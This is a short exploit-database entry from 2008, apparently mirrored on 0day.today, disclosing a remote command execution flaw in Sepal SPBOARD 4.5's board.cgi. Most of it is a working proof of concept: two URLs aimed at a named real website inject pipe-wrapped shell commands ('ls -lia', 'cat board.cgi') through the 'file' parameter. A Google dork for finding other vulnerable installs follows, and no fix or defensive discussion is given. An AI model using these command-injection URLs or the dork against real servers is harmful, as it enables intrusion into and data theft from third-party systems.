id: 11670
date: 10/29/2008
title: Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability
author: GoLd_M
cves: 

===============================================================
Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability
===============================================================

Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability
Script : ):
POC : 
    |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file
    |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file
    |---> Open By Mozilla Firefox 
Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5




#  0day.today [2023-03-26]  #